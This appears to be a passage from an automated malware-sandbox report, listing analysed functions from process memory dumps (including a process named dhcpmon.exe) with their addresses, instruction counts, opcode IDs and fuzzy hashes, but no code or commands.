                                                        Uniqueness Score: -1.00%

                                                        Function 006C3E9C, Relevance: .1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 275d0020e17c32262afcef9c1ef1b7fac93098d1bb3affc869c992da76516303
                                                        • Instruction ID: 418b3373c86a389a6f5feefdfc45ead2cd10d0e5386b307f153ee09ef2564790
                                                        • Opcode Fuzzy Hash: 275d0020e17c32262afcef9c1ef1b7fac93098d1bb3affc869c992da76516303
                                                        • Instruction Fuzzy Hash: FB312832B093648FC725CF6880507FEFBF79B99310F18C9AEC456AB741D6605949C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C45CE, Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a8656fd49c05d14017247780a5e5bf2b4d52b7889a7d547efc2becf92e1d94b
                                                        • Instruction ID: 9e2c3f0b1079e7ca87cc7cfb21bbd58106946594b0cbc619fcaf1ab0ec4944c2
                                                        • Opcode Fuzzy Hash: 9a8656fd49c05d14017247780a5e5bf2b4d52b7889a7d547efc2becf92e1d94b
                                                        • Instruction Fuzzy Hash: 05313975B001148FCB48DB78D4A4AAE77F7AF89324B24826DE115DB3A5DF70DC068B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C4A10, Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55774e521666175bbf429d898e9ac766db7a5adc153ae8aeee6304943ef5f2c2
                                                        • Instruction ID: 5d9b61a6e073e3b08327ad4c7b0c6b48cc8b338c8e024ba55d73aaec52d57441
                                                        • Opcode Fuzzy Hash: 55774e521666175bbf429d898e9ac766db7a5adc153ae8aeee6304943ef5f2c2
                                                        • Instruction Fuzzy Hash: F2318931A012448FD714CB65D968FF97BE3EB85351F0984AEE416CB2A2CB35C945CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C6190, Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17be9d32d3d244bb9a65ee909826cdab63ad299c20810b87239c2429a6546892
                                                        • Instruction ID: 88bd71c82db1444c0b0e3f2c711562ba0e8c66a4afd837193e5e6042d210a607
                                                        • Opcode Fuzzy Hash: 17be9d32d3d244bb9a65ee909826cdab63ad299c20810b87239c2429a6546892
                                                        • Instruction Fuzzy Hash: F0218E31A002199FCB58EBB9D854AFFBBB7EFC5315F04857AD109A7740DB305A0687A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C1768, Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c3372684ab8eca7fa88871e64c67e581931c9be3fdaa0aa3f9594fba7a3ae9b4
                                                        • Instruction ID: 7a3e5dfca1a8b89196d245cbf73d2c8a36db07e82a845ed2153fb807ffba8da1
                                                        • Opcode Fuzzy Hash: c3372684ab8eca7fa88871e64c67e581931c9be3fdaa0aa3f9594fba7a3ae9b4
                                                        • Instruction Fuzzy Hash: 3E314770B151148FC748EB78D494AAE77F2AF4A308B2144A9E416DF7A1DB31DD42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C1778, Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb588f19e8110b0d90ad907d03d507f1855c627886991eb583dda7e4be1f0a70
                                                        • Instruction ID: e674fb1cb828d10ad6011cdaf4bda4b7867a8aa1f9a62ed7efa54b54230d66de
                                                        • Opcode Fuzzy Hash: cb588f19e8110b0d90ad907d03d507f1855c627886991eb583dda7e4be1f0a70
                                                        • Instruction Fuzzy Hash: A8213770B102148FCB48EF78C454AAE73F2EF49708B2144A9E516DB3A1DB31ED42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C6180, Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ecda371650097b6bf2af3bb769cf7fa58e5ebfa6a384c86c7b34f7e8c3333f2
                                                        • Instruction ID: 130a799cc763327901499c8a3bea2c5ec576c8aa20a85997120b2e9f905884e3
                                                        • Opcode Fuzzy Hash: 0ecda371650097b6bf2af3bb769cf7fa58e5ebfa6a384c86c7b34f7e8c3333f2
                                                        • Instruction Fuzzy Hash: DA112530A042445FC724DB78D858AEEBFB2EFC6305F0541AED009D7691DB34490AC7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C5981, Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6fa280e39671253a48b20d54457d27f583b1c083075c6b443ffb221be0aa7460
                                                        • Instruction ID: a1ed05f472da58a73446967dffc29e28dbab75e9c50d0f6e6c2328d1029054b8
                                                        • Opcode Fuzzy Hash: 6fa280e39671253a48b20d54457d27f583b1c083075c6b443ffb221be0aa7460
                                                        • Instruction Fuzzy Hash: 78F0E932B0C1908BD724923C5C203FE6243CBD4365F08C1BED106CB396DE399C8282C6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C06A8, Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825acc3abce36c27d7dc068392378a0b8f8ab2d6c2ec4dfcc08d34d42d7d64e
                                                        • Instruction ID: 05cacda9ce3740a8d9e9f18501494ee2d2f3a0d264f1ce4cf3e62fc5fe63698d
                                                        • Opcode Fuzzy Hash: f825acc3abce36c27d7dc068392378a0b8f8ab2d6c2ec4dfcc08d34d42d7d64e
                                                        • Instruction Fuzzy Hash: EBF090307043049BEB08BBB6E824BFE72DBAB80344B04042DE912D7784EFA0EC4187E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C5821, Relevance: .0, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22b84acb59d188b1aad9b9e03f17d0cfca97e57f976897171094777e7b7a3b22
                                                        • Instruction ID: 146b6b244b52169d19f199cc218ad4c3eb32ced5be172fce42ccb86aaa76c170
                                                        • Opcode Fuzzy Hash: 22b84acb59d188b1aad9b9e03f17d0cfca97e57f976897171094777e7b7a3b22
                                                        • Instruction Fuzzy Hash: 34F082357011009BD304DB75EC58AAEBBA7EBC9311B14D13FE54AC3398CA71590587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C5830, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50dfbbee88f2ef8c2292728b9c30656e7020827492451e8702ba22356e4d424b
                                                        • Instruction ID: ce966d6a079a4ae115e27b3b9b02011ee7c010139cc2f6ea5f6fc3ac78742a20
                                                        • Opcode Fuzzy Hash: 50dfbbee88f2ef8c2292728b9c30656e7020827492451e8702ba22356e4d424b
                                                        • Instruction Fuzzy Hash: 29E06D357011009BC304EB69E89499AB7EBEBC9260754D13EE90AC7359DE709C068BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C59D0, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53841c9c6db30efc58d437e94c06d404d6a0135bd644900bd221a58375810fbe
                                                        • Instruction ID: f16cd19f969ec6f3dde4c51868c34f5b612bf5d606ce0fe39731ba5c73b012f1
                                                        • Opcode Fuzzy Hash: 53841c9c6db30efc58d437e94c06d404d6a0135bd644900bd221a58375810fbe
                                                        • Instruction Fuzzy Hash: 16E0D83260515097C73421AD4804BFA62DA8BC5714F08423B941AD3344DD65ACC282D5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C0FB0, Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dea885dcd8fba5cff685435718703f4a35306e9fc2c9f756e37dfe61bc47a312
                                                        • Instruction ID: b8a8dcc19f2ac68a13466971848fc4ac2feb1bc60e34facd6235372baf672b50
                                                        • Opcode Fuzzy Hash: dea885dcd8fba5cff685435718703f4a35306e9fc2c9f756e37dfe61bc47a312
                                                        • Instruction Fuzzy Hash: 6CF0F478641201CFCB14EFB4D168AADB7F2EF49308F2144ADD4069F7A6CB39A845CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C59E0, Relevance: .0, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9380fcec63dab48c6181591856f39b9c84b5404fede69f90aefdeffc9df50924
                                                        • Instruction ID: c2b03d5eed8f7a61675c348644e90ce20ca792bdeccc7b85f899e21b4c33d215
                                                        • Opcode Fuzzy Hash: 9380fcec63dab48c6181591856f39b9c84b5404fede69f90aefdeffc9df50924
                                                        • Instruction Fuzzy Hash: 49D0C23230566057C728216E5804BEA62CA8BC9B19B08013FA40BC3704DE61AC8282E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 006C0B38, Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.666902471.00000000006C0000.00000040.00000001.sdmp, Offset: 006C0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f1fba0e804f0edcb2e31956c157534e8f066076816fe6cc66f6e935cb68fa138
                                                        • Instruction ID: 0e7509b3d5071c0e3c1f66c40e316f2c5ae2a3075d422ebe0ebb20270b5e521d
                                                        • Opcode Fuzzy Hash: f1fba0e804f0edcb2e31956c157534e8f066076816fe6cc66f6e935cb68fa138
                                                        • Instruction Fuzzy Hash: A1D01230E0110CEB8B40EFA8E91149DB7FADF45305B1088ADD509D7250DA715F109B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: dhcpmon.exe PID: 6968 Parent PID: 968 dhcpmon.exeCOMMON

                                                        Executed Functions

                                                        Function 02E32148, Relevance: 1.6, Instructions: 1621COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 931baa688f3fec403fd4cae9f7e0b75613cd150b844002196dc81dcf152d7f7e
                                                        • Instruction ID: 521b9fcf4f202cd848ea0c19beedfd2aa77e3755d91422323029b05e7252c8f7
                                                        • Opcode Fuzzy Hash: 931baa688f3fec403fd4cae9f7e0b75613cd150b844002196dc81dcf152d7f7e
                                                        • Instruction Fuzzy Hash: 4FE2B131A5021DABD721DF60CC54BE9B3B2FFD9304F5685E5A2082B295DFB06A85CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E32133, Relevance: 1.6, Instructions: 1597COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d9b82b812039dd59416af3b5dec0197234ab32099ada8686d47a67a3d5f730f
                                                        • Instruction ID: a0a7d01936d9e3f6db204cbed9206f2a5e5ca2950a2e75292801ef67ca58d789
                                                        • Opcode Fuzzy Hash: 0d9b82b812039dd59416af3b5dec0197234ab32099ada8686d47a67a3d5f730f
                                                        • Instruction Fuzzy Hash: AAE2B131A5021DABD721DF60CC44BE9B3B2FFD8304F5285E5A2082B295DFB46A85CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E34580, Relevance: .6, Instructions: 610COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21accec521651c6c6ef35a311a87e0148e7a574af20b6e21dc84d4fac555238d
                                                        • Instruction ID: 3f7cd84b302dd240d731a1147a98f7c462e1026d727659edfc1234a9a2a02b2f
                                                        • Opcode Fuzzy Hash: 21accec521651c6c6ef35a311a87e0148e7a574af20b6e21dc84d4fac555238d
                                                        • Instruction Fuzzy Hash: 0F426C34600209CFDB15DF68C848AAEBBF2FF89305F46C469E5168B2A5DB74ED85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E35858, Relevance: .4, Instructions: 379COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 972ac0aea279622a5d73b10506588f3d7c6487c3a1a686fc58e35f7abf3dd0e8
                                                        • Instruction ID: 3008eac2d9a42db109879808f8e30bbc8a55220eb4dc15a9a0e016471fd03a0d
                                                        • Opcode Fuzzy Hash: 972ac0aea279622a5d73b10506588f3d7c6487c3a1a686fc58e35f7abf3dd0e8
                                                        • Instruction Fuzzy Hash: 3CD1A2307402048FDB25DF24D8A8BAAB3F2AF88319F54D46DD5168B795CB75DC45CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E30448, Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d-%l$d-%l
                                                        • API String ID: 0-2065804076
                                                        • Opcode ID: 806d1340867331b37aa71efdb690a1473d0c8524e89f8295736f917516e5ce67
                                                        • Instruction ID: c21cf6299bb7c3eeca403f522330a6fa32dac7a94f3154d46617af1da4198131
                                                        • Opcode Fuzzy Hash: 806d1340867331b37aa71efdb690a1473d0c8524e89f8295736f917516e5ce67
                                                        • Instruction Fuzzy Hash: 2E419D70E042099FCB04EFB8D454BDDBBF2AF88318F01846AD1059B364EB749D4ACB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E30439, Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d-%l$d-%l
                                                        • API String ID: 0-2065804076
                                                        • Opcode ID: af94be5b484500d650c7ef4561791bc99844ddcc688fb778a109c6d6f4247660
                                                        • Instruction ID: fdd571d1b14687f07f0d8307f1dcc4f64189be30067b1425340c8f6e73e31c48
                                                        • Opcode Fuzzy Hash: af94be5b484500d650c7ef4561791bc99844ddcc688fb778a109c6d6f4247660
                                                        • Instruction Fuzzy Hash: 91318134E4420EDFCB15EFA8D454ADDB7F2BF84319F04842AE0049F264DB74994ACB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E34E8C, Relevance: .4, Instructions: 441COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e2200e3bb5c7da98a4380b495f0d0085396080422e4e51c32f08508aaca2c166
                                                        • Instruction ID: 86a39f6cfa51f0128f7524168af1db9e9b141fc4b7e9f78ece57cc3c24214010
                                                        • Opcode Fuzzy Hash: e2200e3bb5c7da98a4380b495f0d0085396080422e4e51c32f08508aaca2c166
                                                        • Instruction Fuzzy Hash: BE21F370A082448FEB16EBB4D4247ED7BF3AFCD208FA48429C005E7394EB359905CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E30C62, Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5d65bbe6206b9cf24496d5d32e54bb550de6f0e7fd5d5bbaac20aa87f1484768
                                                        • Instruction ID: bc350737ee851cca2748c898447480bde32ba1ccf974209a2ba6d2cda677274a
                                                        • Opcode Fuzzy Hash: 5d65bbe6206b9cf24496d5d32e54bb550de6f0e7fd5d5bbaac20aa87f1484768
                                                        • Instruction Fuzzy Hash: 39914D71A0020CEFCB15DFE5D854AEEBBFAAF88305F14852AE505EB254DB34A906CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E31EB0, Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76def984deb4ab740467abdfc83e9e49b67c960b708b68b51593e744ec607f31
                                                        • Instruction ID: bb34bb6cbb2196d73f8ed28ff6e1abeebfd187b96934491d301b8cee60045037
                                                        • Opcode Fuzzy Hash: 76def984deb4ab740467abdfc83e9e49b67c960b708b68b51593e744ec607f31
                                                        • Instruction Fuzzy Hash: 1371C531B40209AFDB15DB61C854BEEB7F6AF88309F148529E906DB394DB70ED46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E313C8, Relevance: .2, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 973f4f718353b008826f784fd80674ff7480fd0b56d9b7c4361e4343f43be13d
                                                        • Instruction ID: 39244a53116fe7d9b677b8b568046e2f1773d3bc9945cf446a4adacb838f7516
                                                        • Opcode Fuzzy Hash: 973f4f718353b008826f784fd80674ff7480fd0b56d9b7c4361e4343f43be13d
                                                        • Instruction Fuzzy Hash: 3051BE71E042589FCB15EBA998146FEBBF2EF85211F14C0BBD509DB250EB384906CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E33CF8, Relevance: .2, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed360abb7b5c5cfcafc23bebd607910fb1cfe158ea991484dfa35f7a7683b32b
                                                        • Instruction ID: 99e97ddb058bbc7ccef1380e2287b72d082b65f8274f311d932f6a9a5e18f7d9
                                                        • Opcode Fuzzy Hash: ed360abb7b5c5cfcafc23bebd607910fb1cfe158ea991484dfa35f7a7683b32b
                                                        • Instruction Fuzzy Hash: F9518E31A00259DFCB12CFA9C844AEEFBF1FF4A316F4581A6E854AB251D734AD45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E318C0, Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb1e55a2d6c13f094e81193f32b8d6557ce30f4769f69aa86b18d7605185cbbd
                                                        • Instruction ID: ed64ca23d183613215422f03f0730e7b0cb6ad9fa7cba34a5d776c537e037709
                                                        • Opcode Fuzzy Hash: cb1e55a2d6c13f094e81193f32b8d6557ce30f4769f69aa86b18d7605185cbbd
                                                        • Instruction Fuzzy Hash: D7416B34A002099FCB05EF64D8549AE77F6EF89351B11C16BE50ACB369EB70AD06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E33E99, Relevance: .1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f865f4102af6b1d8fe6423eadb0de366de9614616cabb3592eecd3987f749039
                                                        • Instruction ID: 3e0e4916a910789e6f1ba4a09a5802b00f41f0724a03e6839c6f5b828190eae6
                                                        • Opcode Fuzzy Hash: f865f4102af6b1d8fe6423eadb0de366de9614616cabb3592eecd3987f749039
                                                        • Instruction Fuzzy Hash: F3314A327483858FCB268B7940546FEFBF35F99219F08C1AAC442DB345DA619849C7E2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E318B0, Relevance: .1, Instructions: 105COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d7f0ccce94e3de97d4d628d20928b63e2bece78c2fa9d9831eeb6803332bfb3
                                                        • Instruction ID: a860f2ccae1eda0d9ede3f13a895d6cad112e19cf175704300bdc9a24bd5e8bc
                                                        • Opcode Fuzzy Hash: 8d7f0ccce94e3de97d4d628d20928b63e2bece78c2fa9d9831eeb6803332bfb3
                                                        • Instruction Fuzzy Hash: E0419D34A00109DFCB15DF64D8549AD77F2EF89355B01C16AE4058B378EB30AD06CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E35CF0, Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52c61a4002b8c3e8af76766911f0a83092dea0169ea252711e982276edf6dd74
                                                        • Instruction ID: 772afa8da80d079636ccaec4bcd81b72c26b72639c01ce173240f4f2e47643a2
                                                        • Opcode Fuzzy Hash: 52c61a4002b8c3e8af76766911f0a83092dea0169ea252711e982276edf6dd74
                                                        • Instruction Fuzzy Hash: F021B031E002099FCB18EBB5D8546FFBBF6EFC8214F50846AD119E7354DB7459068BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E34572, Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb345290363412264b29724d13dd322dba83286df1ae5af7f965ec67d361c5c9
                                                        • Instruction ID: 55382be39ae496da3935151bbcc7c34731b0935615fa1235da57cca51e046755
                                                        • Opcode Fuzzy Hash: eb345290363412264b29724d13dd322dba83286df1ae5af7f965ec67d361c5c9
                                                        • Instruction Fuzzy Hash: 8921AD31A41304CFDB26CF68D848BAE7BF6EF45206F4690AAE415CB2A5E334C945DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E31768, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f38090a395956e59601167de2edf40d54c47fbd2ac7d9a2e61ddccbfa36ec4e8
                                                        • Instruction ID: 97c5a9e5b12e8add803eb1199c2fef3e95e5fc9da6f20353e8f9687ef0bb92b0
                                                        • Opcode Fuzzy Hash: f38090a395956e59601167de2edf40d54c47fbd2ac7d9a2e61ddccbfa36ec4e8
                                                        • Instruction Fuzzy Hash: 64217A70B001148FCB49EF78D468AAE77B2AF89309B2144A9E50ADF371DB31DC46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0147D4A0, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667491089.000000000147D000.00000040.00000001.sdmp, Offset: 0147D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8faf7dd446c62b0f49f74aa9fb8ce2f21fa3d0b4fd13cba6f43712d6df30b70
                                                        • Instruction ID: 712a2c76f7fa3485566a2a181dfd1ba6034c936606e1cd6a84d6c4d25aa330e8
                                                        • Opcode Fuzzy Hash: e8faf7dd446c62b0f49f74aa9fb8ce2f21fa3d0b4fd13cba6f43712d6df30b70
                                                        • Instruction Fuzzy Hash: 54212BB1904240DFDB15CF54D9C0B57BF65FF84328F24856AD9054B226C375E846C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0147D3B4, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667491089.000000000147D000.00000040.00000001.sdmp, Offset: 0147D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d744911afbbaf63b38f0186459db9a752d67714a65c4cc49c35078ef1c45de6
                                                        • Instruction ID: 1b96bed17756541a61100277bc594310eed684d529cafd3e67e446c001eca18b
                                                        • Opcode Fuzzy Hash: 4d744911afbbaf63b38f0186459db9a752d67714a65c4cc49c35078ef1c45de6
                                                        • Instruction Fuzzy Hash: 172106B1904240DFDB05CF54D8C0B97BB65FF84324F24C57AE9095B256C336E856CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02E31778, Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.667621992.0000000002E30000.00000040.00000001.sdmp, Offset: 02E30000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 485b45ee814f0b3d448c18fbab3a6779cab00f678b96e659a89438b85bb270e3
